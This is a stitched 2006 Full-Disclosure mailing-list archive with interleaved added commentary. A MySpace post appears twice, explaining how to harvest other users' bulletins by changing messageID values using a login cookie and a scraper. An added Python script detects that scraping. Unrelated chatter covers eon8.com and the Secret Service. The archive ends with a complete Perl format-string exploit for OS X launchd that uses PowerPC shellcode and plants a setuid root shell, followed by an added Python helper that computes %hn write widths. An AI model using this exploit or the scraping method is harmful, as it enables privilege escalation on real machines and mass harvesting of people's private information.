Yes, you guessed it. If you change the messageID number,
you can view any bulletin on Myspace that hasn't yet
expired. Now, if we could just collect a ton of bulletins,
then we could surely find some juicy information like
cell phone numbers, when people are leaving for vacation,
where they're going... the list goes on and on.

The implementation of bulletins so that everyone can view them
may be intentional, but most people assume that bulletins are
only readable by friends. Because of this belief, many people
post personal details in bulletins, never expecting people
like you to read them. The mere existence of the "Delete from
friends" button implies that only friends should be able to
read your bulletins.

--

3. Mining the data

I was able to whip together a small C program that generates
urls, retrieves the bulletin, and saves the html to a file.
Once all of the data has been downloaded, it's easy to parse
through using a tool like grep.

In order for this program to work, you need to download a
tool called 'netcat'. You will also need to get your cookie
once you're logged into myspace, so that you can view the
bulletins.

First of all, let's create a new file named request.txt
The contents should look something like this, but you'll need
to change the cookie to match yours.

===

Host: bulletin.myspace.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: TIMEZONE=3;
ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK
ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4
A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83
5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x;
NGUserID=a258ca5-2341-1231956342-6;
MYSPACE=myspace; AUTOSONGPLAY=0;
UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x
A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0;
COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB
gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3
D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US;
MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli
AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea
aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda
ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf
aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff
2FADFaEFeaDfagFhGHggFgadcAweadddafdasfeafgeaeageaijlkfjai;hj;JIOJlihluhkHUIHKhuilgliuHLIUHLHhhh
h0DSAFOOJaewoi'jfa;ilj;oi:IOnjiehjioh;iH:IH;iohi;hg;juGYFyjfyjflukhaljdkfaejoijlajdlifjealijddd
WIaOJFoa;ejklijdaFOJEaIjo:IJEAOIJEoajf:EOJAjdailjdf;ilaj;lijioj;oije;aojojaoijoiej;oaijo;ij;oij
hNaoijao;ijdoifj;ckxx,jaiojeifajkjnaklhugi834829ijljadflkj3alijadlkjfaeljaclijeakjdoijgealijdcd
Fsaijo;ij3;oaij;oijod;iasj;oijx90asjoij3alij;ioadjf;iojeo;iaj;oij;dkjfkdjlakjdlska;
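
The post above describes a classic insecure direct object reference: a sequential `messageID` with no check that the requester is a friend of the poster, so a loop over the ID space reads everyone's bulletins. Its C program is not shown on the page. As an added example (not the author's code), here is the detection side of the same problem in Python: it parses constructed Apache-style access-log lines for the `bulletin.read` URL and flags a client whose distinct `messageID` values form a tight ascending run, which is what an enumeration loop produces and an ordinary user reading a few friends' bulletins never does. The log format, addresses and thresholds are assumptions; the log lines are constructed, not real MySpace traffic.

```python
"""Spot sequential messageID enumeration in web-server access logs.

Added example, not from the post above (whose C program is not shown).
Log format, addresses and thresholds are assumptions; the log lines are
constructed, not real MySpace traffic."""
import re
from collections import defaultdict

# Apache/NCSA combined-style request line (assumed format)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)
ID_RE = re.compile(r'[?&]messageID=(\d+)')


def parse_bulletin_reads(lines):
    """Yield (client_ip, messageID) for every successful bulletin read."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("status") != "200":
            continue
        path = m.group("path")
        if "fuseaction=bulletin.read" not in path:
            continue
        idm = ID_RE.search(path)
        if idm:
            yield m.group("ip"), int(idm.group(1))


def detect_enumeration(lines, min_reads=10, max_step=5, min_ratio=0.8):
    """Return {ip: stats} for clients whose distinct messageIDs mostly sit
    within max_step of each other when sorted: a friend reading bulletins
    gets scattered IDs, an enumerator walks them one after another."""
    ids_by_ip = defaultdict(set)
    for ip, mid in parse_bulletin_reads(lines):
        ids_by_ip[ip].add(mid)
    suspects = {}
    for ip, ids in ids_by_ip.items():
        if len(ids) < max(min_reads, 2):   # need at least one step to score
            continue
        ordered = sorted(ids)
        steps = [b - a for a, b in zip(ordered, ordered[1:])]
        ratio = sum(1 for d in steps if d <= max_step) / len(steps)
        if ratio >= min_ratio:
            suspects[ip] = {"distinct_ids": len(ids),
                            "sequential_ratio": round(ratio, 2),
                            "first_id": ordered[0], "last_id": ordered[-1]}
    return suspects


def sample_log():
    """Constructed access-log lines: one enumerator, one ordinary user, noise."""
    tmpl = ('{ip} - - [30/Jun/2006:22:{mm:02d}:{ss:02d} +0000] '
            '"GET /index.cfm?fuseaction=bulletin.read&messageID={mid} HTTP/1.1" '
            '{status} 5120')
    # 10.0.0.5 walks IDs 1000..1049 one per second
    lines = [tmpl.format(ip="10.0.0.5", mm=0, ss=i, mid=1000 + i, status=200)
             for i in range(50)]
    # 10.0.0.9 opens three bulletins from friends, widely spaced IDs
    lines += [tmpl.format(ip="10.0.0.9", mm=5, ss=i, mid=mid, status=200)
              for i, mid in enumerate((20481, 47712, 90123))]
    # noise: a non-bulletin request and a denied read
    lines.append('10.0.0.9 - - [30/Jun/2006:22:06:00 +0000] '
                 '"GET /index.cfm?fuseaction=user.home HTTP/1.1" 200 900')
    lines.append(tmpl.format(ip="10.0.0.5", mm=7, ss=0, mid=1050, status=403))
    return lines


if __name__ == "__main__":
    for ip, stats in detect_enumeration(sample_log()).items():
        print(ip, stats)
```

Detection like this only catches the naive loop; a scraper that randomises IDs or spreads requests over many addresses and accounts defeats it, so the real fix is the missing authorisation check on the server: look up the bulletin's poster and serve it only if the requesting account is on that poster's friend list. Keying the statistics on the logged-in account rather than the IP, where the log carries it, also makes the heuristic harder to dodge.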

Re: [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Aaron Gray



Looks pretty ominous, I would not log onto 
it if I were you until tomorrow.

There is a counter counting down, 4 hours 35 
minutes to go. It's logging your IP address as well.

Don't know, maybe nothing, but it looks a bit ominous 
as I said.

If I do not post a message within 5 hours you will 
know that I have been cracked :)

Aaron

- Original Message - 
From: "Jay Buhrt" [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 10:13 PM
Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com

Does anyone know about this site, or the projects related to it? 
www.eon8.com ?

-- 
Jay Buhrt
Achievement Focused Technology, Inc. 
[EMAIL PROTECTED] 
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Aaron Gray
The counter restarts with a different time each time you refresh the page, 
so not so ominous!


Aaron

- Original Message - 
From: Jay Buhrt [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 10:13 PM
Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com


Does anyone know about this site, or the projects related to it? 
www.eon8.com ?


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Cardoso
it was digged a few hours ago.

people agreed it's a viral for a game, or something. 

of course conspiracy buffs are LOVING the idea of some evil organization
USING A FRACKING WEBSITE to talk to their members...



On Sat, 1 Jul 2006 00:30:49 +0100
Aaron Gray [EMAIL PROTECTED] wrote:

AG The counter restarts with a different time each time you refresh the page, 
AG so not so ominous!
AG 
AG Aaron
AG 
AG - Original Message - 
AG From: Jay Buhrt [EMAIL PROTECTED]
AG To: full-disclosure@lists.grok.org.uk
AG Sent: Friday, June 30, 2006 10:13 PM
AG Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com
AG 
AG 
AG  Does anyone know about this site, or the projects related to it? 
AG  www.eon8.com ?
AG 
AG  -- 
AG  Jay Buhrt
AG  Achievement Focused Technology, Inc.
AG  [EMAIL PROTECTED]
AG  574-538-8944
AG 
AG  ___
AG  Full-Disclosure - We believe in it.
AG  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG  Hosted and sponsored by Secunia - http://secunia.com/ 
AG 
AG ___
AG Full-Disclosure - We believe in it.
AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG Hosted and sponsored by Secunia - http://secunia.com/
AG 

year(now) + 1 will be the year of Linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog: 
http://www.carloscardoso.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Aaron Gray

Just being careful.

Phew, I thought some evil organization was just about to hack the world with 
a new 0day :)


Aaron

- Original Message - 
From: Cardoso [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Saturday, July 01, 2006 12:40 AM
Subject: Re: **SPAM** [Full-disclosure] Weird... www.eon8.com


it was digged a few hours ago.

people agreed it's a viral for a game, or something.

of course conspiracy buffs are LOVING the idea of some evil organization
USING A FRACKING WEBSITE to talk to their members...



On Sat, 1 Jul 2006 00:30:49 +0100
Aaron Gray [EMAIL PROTECTED] wrote:

AG The counter restarts with a different time each time you refresh the 
AG page, so not so ominous!
AG
AG Aaron
AG
AG - Original Message - 
AG From: Jay Buhrt [EMAIL PROTECTED]

AG To: full-disclosure@lists.grok.org.uk
AG Sent: Friday, June 30, 2006 10:13 PM
AG Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com
AG
AG
AG  Does anyone know about this site, or the projects related to it?
AG  www.eon8.com ?
AG 
AG  -- 
AG  Jay Buhrt

AG  Achievement Focused Technology, Inc.
AG  [EMAIL PROTECTED]
AG  574-538-8944
AG 
AG  ___
AG  Full-Disclosure - We believe in it.
AG  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG  Hosted and sponsored by Secunia - http://secunia.com/
AG
AG ___
AG Full-Disclosure - We believe in it.
AG Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG Hosted and sponsored by Secunia - http://secunia.com/
AG

year(now) + 1 will be the year of Linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog: 
http://www.carloscardoso.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] United States Secret Service

2006-06-30 Thread n3td3v

They replace a website with the USSS logo, like what happened in the
case of the Shadow Crew. I'm not pro Shadow Crew, but I find it highly
offensive that the USSS are acting in such a "This is now property of
the USSS" with logo, asking the remaining members of said group to
hand themselves in. I don't care if you are a government, corporation
or intelligence agency, there is no excuse for defacement, both legal
and illegal, because it sends out the wrong message. It looks like
defacement, it feels like defacement, it may not be illegal, but it
sure gives out the wrong signal to the wrong audience.

People in the know know exactly what my comments above are about.

I'm re-issuing my original outcry over the conduct and policy of USSS
due to the recent conviction of the co-founder of shadow crew.

Thanks,

n3td3v

It will be interesting to see if folks remember what i'm talking
about, and those who do are truly on the ball.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 21:15:27 -0300, Cardoso said:
 Yes, you may be right. What better place to hide than in plain sight? 
 
 Using the old nobody would do that, we^H^H they can publish evil
 instructions the operatives, and all the fools at NSA, GRU and MI-6 will
 never take us^H^H them seriously until it's too late.

The whole Steve Jackson Games thing was a set-up to make the TLAs wary. ;)


pgpVpeZDJ6Gps.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] United States Secret Service

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 23:30:08 BST, n3td3v said:
 They replace a website with the USSS logo., like what happened in the
 case of the shadow crew.

You got any proof the USSS actually did it, and isn't being joe-jobbed here?

For starters, logs showing where/how the logo was uploaded, and other
evidence linking that IP address to the USSS.


pgp3hQijqwMuX.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Juha-Matti Laurio

Sometimes checking the cached Google version gives some basic information 
without visiting a URL.
But when choosing 'Show Google's cache of www.eon8.com/'
my Firefox says "Transferring data from www.eon8.com..."
This is weird and not expected, because I have never visited this site.

Cached version was saved on 22nd Jun. It shows Googlebot's IP at main page:
IP: 66.249.66.207 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)

I.e., why is there traffic to eon8.com at all?

- Juha-Matti

Aaron Gray [EMAIL PROTECTED] wrote: 


Just being careful.

Phew, I thought some evil organization was just about to hack the world with 
a new 0day :)


Aaron


--clip--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Hah, Interesting.....

2006-06-30 Thread Jay Buhrt

{eon8} Complete
As of July 1st, 2006, the E8 Project has completed.
The purpose of this project was to determine the reactions of the 
internet public to lack of information.

History
The domain eon8.com was chosen, as it is short, easily remembered, and 
eon9 was already registered.
It was originally posted on www.msfn.org, but was promptly removed as 
'spam'. It was enough time for it to be copied to other forums 
throughout December 2005.

Results
We were amazed to discover that the site was instantly linked with 
terrorism, simply for the fact that it seems mysterious. Evil was the 
number one first impression people had of the site, in spite of the fact 
that there are no threats on the site. The only thing Eon 8 says is "We 
don't want you here." Nothing else.
Other less disappointing opinions were social experimentation (which was 
correct), James Bond movie viral marketing, and promotions for video games.
For many people, being faced with a countdown timer was an instant 
reason to try to shut down or hack the site. This is a worrying 
reaction, that if someone doesn't understand something they must destroy 
it. As a result, the servers have been hit quite hard these last few 
days, but luckily 99% of the 'hackers' could easily be described as 
'l4me n00bs'.
Another worrying example of paranoia was how quickly people would jump 
to conclusions, such as telephoning the registered owner of a dog seen 
in a photograph on a server that hosts a page that links to eon8.

Surprises
The folks at Unfiction.com were the most resourceful and inventive, they 
successfully managed to decrypt several of the 'codes' on the site, 
forcing them to be re-encrypted using more secure methods.

FAQ
What about eon5.com?
Nothing to do with us. Pure coincidence, but worked in our favor.

What about the 8th eon being the end of the world?
We picked Eon 8 because Eon 9 was already taken. We didn't know about 
the significance of this. Eon is a cool sounding word!


Why July 1st?
We didn't know how long it would take to get the word out using our 
subtle promotion methods. We allowed over 6 months.


What do the codes on the site mean?
They're mostly randomly generated integers encrypted with md5, but with 
certain letters removed and replaced. The Logs page is simply based on 
the current timestamp, encrypted and modified. You can't decrypt them, 
they really are random numbers.


What is the Deployment Map?
They're dots placed over major cities and several random locations, it 
was done mostly from memory. The random gif filename is an added touch 
to force a slight delay on loading, which looks more impressive in 
Internet Explorer, but not as much in Firefox.


What's the password?
There isn't one. If you did somehow manage to get in, you'd see an empty 
folder with a single text file that says This is a decoy folder. Please 
connect to the internal secure network.


Can I see your website statistics?
Yes, click here.

Are you anything to do with Scientology?
Did you see anything talking about a Free Personality Test or Xenu? Use 
your brain.


Who are you, really?
The most I can tell you is I am a 23 year old web designer from Florida 
named Mike. I can't narrow it down anymore than that. When I say 'we', I 
really mean 'me'.

Conclusions
People take things too seriously and panic over the most trivial things. 
But at the same time there are many people out there who think things 
through without jumping to conclusions. You can't let pointless 
speculation rule your lives and force you to live in fear.

In Closing
Thanks to everyone who kept things interesting, especially to the folks 
at unfiction. Sorry there is no ARG for you to play, but at least you 
had fun while it lasted.



Click here for one Final Message from Eon 8

BE HAPPY
THE END
Sincerely, x21b

Happy birthday, mtcaptain. From 'ls224' (aka x21b). Yes that really was 
me in the #eon-8 channel


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Data Mining Myspace Bulletins

2006-06-30 Thread Robert Waters

The same goes for forums; you can even read posts from private forums.
Unfortunately, you aren't able to tell which forum a post came from
just from the postID, and it is enormously difficult to guess what
postids might appear in which group, due to the high volume.
If anyone is interested in this (which I doubt), I've got a perl script
to slurp a range of them (which is way shorter than your C :P but
probably slower).
It can certainly be an interesting read though; people seem to have a
false sense of anonymity, judging from what they're willing to admit
on these forums.

On 6/30/06, John Hackenger [EMAIL PROTECTED] wrote:

Myspace Bulletins: The good, the bad, and the ugly

Data Mining Myspace, a case study

Author: stderr ([EMAIL PROTECTED])
http://stderr.linuxinit.net

Original release:
http://www.pandora-security.com

--

1. Abstract

We all know about myspace.com, and I'll go ahead and admit
that I actually have an account to keep up with friends.
Myspace is full of a bunch of idiots, but it can be a great
tool for keeping up with people... when used properly.

Myspace has long been a hacker playground, you may remember
the infamous "Samy is my hero" worm. The worm took advantage
of several poor input validation techniques which were being
employed. Each person that went to a page with his script in it,
automatically sent him a friend request. After this alarming
stunt, Myspace fixed a lot of the injection vulnerabilities.

--

2. Introduction to Bulletins

On Myspace, you can send bulletins which are sent to all
of the friends on your list. That way if you're going on
vacation or something, you can let ALL of your friends know
what's happening by sending only one message. Most people
assume that only their friends can read the bulletins they
post... they are sadly mistaken.

When you open up a bulletin, you go to a url like the following.

http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=1

Yes, you guessed it. If you change the messageID number,
you can view any bulletin on Myspace that hasn't yet
expired. Now, if we could just collect a ton of bulletins,
then we could surely find some juicy information like
cell phone numbers, when people are leaving for vacation,
where they're going... the list goes on and on.

The implementation of bulletins so that everyone can view them
may be intentional, but most people assume that bulletins are
only readable by friends. Because of this belief, many people
post personal details in bulletins, never expecting people
like you to read them. The mere existence of the "Delete from
friends" button implies that only friends should be able to
read your bulletins.

--

3. Mining the data

I was able to whip together a small C program that generates
urls, retrieves the bulletin, and saves the html to a file.
Once all of the data has been downloaded, it's easy to parse
through using a tool like grep.

In order for this program to work, you need to download a
tool called 'netcat'. You will also need to get your cookie
once you're logged into myspace, so that you can view the
bulletins.

First of all, let's create a new file named request.txt
The contents should look something like this, but you'll need
to change the cookie to match yours.

===

Host: bulletin.myspace.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: TIMEZONE=3;
ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK
ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4
A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83
5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x;
NGUserID=a258ca5-2341-1231956342-6;
MYSPACE=myspace; AUTOSONGPLAY=0;
UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x
A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=; rsi_want=0;
COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB
gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3
D%3D; MSCulture=IP=127.0.0.1IPCulture=en-USPreferredCulture=en-USCountry=US;
MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli
AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea
aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda

Re: [Full-disclosure] DMA[2006-0628a] - 'Apple OSX launchd unformatted syslog() vulnerability'

2006-06-30 Thread K F (lists)

Just so no one feels left out...


-KF
#!/usr/bin/perl
#
# http://www.digitalmunition.com/FailureToLaunch-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# Much appreciation goes to John H for all kindsa random shit like exploiting
# Veritas and other random things in the past
#
# core... where the hell are you fool.
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a
# saved return addy with our shellcode address.
# This code currently overwrites a saved return addy with the stack location of
# our seteuid() / execve() shellcode.
#
# This exploit will create a malicious .plist file for you to use with launchctl
# kevin-finisterres-mac-mini:~ kfinisterre$ launchctl load ./com.pwnage.plist
#
# In theory I guess you could also drop this in ~/Library/LaunchAgents
#
# This was tested against OSX 10.4.6 8l127 on a 1.25GHz PowerPC G4 and a
# 500mhz PowerPC G3 running 10.4 8A428
#
# kevin-finisterres-mac-mini:~ kfinisterre$ ls -al /sbin/launchd
# -rwsr-sr-x   1 root  wheel  80328 Feb 19 04:09 /sbin/launchd
# kevin-finisterres-mac-mini:~ kfinisterre$ file /sbin/launchd
# /sbin/launchd: setuid setgid Mach-O executable ppc
#
# ./src/SystemStarter.c:374:  syslog(level, buf);
#
# http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/AccessControl.html
# "Because launchd is a critical system component, it receives a lot of peer
#  review by in-house developers at Apple. It is less likely to contain
#  security vulnerabilities than most production code."
#

# Empty the environment so the stack layout (and the TERM_PROGRAM offset) is predictable
foreach $key (keys %ENV) {
    delete $ENV{$key};
}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
"\x7c\x63\x1a\x79" .
"\x40\x82\xff\xfd" .
"\x39\x40\x01\xc3" .
"\x38\x0a\xfe\xf4" .
"\x44\xff\xff\x02" .
"\x39\x40\x01\x23" .
"\x38\x0a\xfe\xf4" .
"\x44\xff\xff\x02" .
"\x60\x60\x60\x60" .
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd" .
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70" .
"\x39\x40\x01\x70\x39\x1f\xfe\xcf" .
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" .
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" .
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb" .
"\x44\xff\xff\x02\x7c\xa3\x2b\x78" .
"\x38\x0a\xfe\x91\x44\xff\xff\x02" .
"\x2f\x74\x6d\x70\x2f\x73\x68\x58";   # "/tmp/shX"

$writeaddr = 0xbcf8; # Saved Return addy from frame 3
# Payload in the environment: the two target addresses the %hn writes use,
# then padding, then the shellcode. The literal string before "x 1" did not
# survive list archiving; "\x60\x60\x60\x60" (a ppc no-op) is an assumption.
$ENV{TERM_PROGRAM} = "-" . pack('l', $writeaddr) . pack('l', $writeaddr+2) .
    "\x60\x60\x60\x60" x 1 . $sc;

$format =
# make it more robust yourself... I'm lazy
# 0xbfff fe70
"%" . 0xbfff . "d%112\$hn" .
"%" . 0x3ed9 . "d%113\$hn";

# Build the setuid root shell the shellcode will execve()
open(SUSH, ">/tmp/aaa.c");
printf SUSH "int main(){seteuid(0);setuid(0);setgid(0);system(\"/bin/sh\");}\n";
close(SUSH);   # flush before cc reads the file
system("PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c");

# The format string goes into the job's Label, which launchd later passes to syslog()
open(PWNED, ">com.pwnage.plist");
print PWNED "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>" . $format . "</string>
<key>ProgramArguments</key>
<array>
<string>http://www.digitalmunition.com</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>\n";
close(PWNED);
print "open a new window and type - \"launchctl load ./com.pwnage.plist\"\n";
system("/sbin/launchd");


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
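
The exploit above hard-codes its two `%hn` writes as `%49151d%112$hn%16089d%113$hn`: the first `%d` pads the output to 0xbfff characters before the short write to the address in argument 112, the second pads it further before the write to argument 113, and since `%hn` stores the running character count modulo 65536 the two stores together assemble a 32-bit value. As an added example (not Kevin's code), here is that arithmetic in Python for any target value and any pair of argument slots, plus a replay of printf's bookkeeping to check the result. Argument numbers, targets and the minimum width are assumptions; replaying the pair from the script shows it stores 0xbffffed8, not the 0xbffffe70 noted in its comment.

```python
"""Width arithmetic for a pair of %hn writes in a format-string exploit.

Added example, not part of the exploit above. Argument indexes, target
values and MIN_WIDTH are assumptions chosen for illustration."""
import re

# Keep every %Nd wide enough that the integer it prints never exceeds N
# columns; otherwise the character count would overshoot the plan.
MIN_WIDTH = 8


def hn_write_pairs(target, hi_index, lo_index, printed=0):
    """Build the %<width>d%<arg>$hn sequence that stores the 32-bit `target`
    as two 16-bit halves: the high half through argument `hi_index` (which
    must hold addr) and the low half through `lo_index` (addr + 2, on a
    big-endian machine like ppc). `printed` is the number of characters
    already emitted before the format string is reached.

    Returns (format_string, plan) where plan lists (arg, width, stored)."""
    if not 0 <= target <= 0xffffffff:
        raise ValueError("target must fit in 32 bits")
    halves = [((target >> 16) & 0xffff, hi_index), (target & 0xffff, lo_index)]
    halves.sort()            # write the smaller value first: shortest output
    fmt, plan, count = "", [], printed
    for value, index in halves:
        delta = (value - count) % 0x10000      # chars still needed mod 2^16
        if delta < MIN_WIDTH:                  # too small to hold an int: wrap
            delta += 0x10000
        fmt += "%%%dd%%%d$hn" % (delta, index)
        count += delta
        plan.append((index, delta, count & 0xffff))
    return fmt, plan


HN_RE = re.compile(r"%(\d+)d%(\d+)\$hn")


def simulate_hn_writes(fmt, printed=0):
    """Replay printf: each %Nd adds N to the character count (assuming the
    argument fits in N columns) and each %k$hn stores the low 16 bits of
    that count through argument k. Returns {arg: stored_value}."""
    writes, count = {}, printed
    for width, index in HN_RE.findall(fmt):
        count += int(width)
        writes[int(index)] = count & 0xffff
    return writes


def assembled_value(writes, hi_index, lo_index):
    """Recombine the two stored halves into the 32-bit word at addr."""
    return (writes[hi_index] << 16) | writes[lo_index]


if __name__ == "__main__":
    fmt, plan = hn_write_pairs(0xbffffe70, 112, 113)
    print(fmt, plan)
    print(hex(assembled_value(simulate_hn_writes(fmt), 112, 113)))
```

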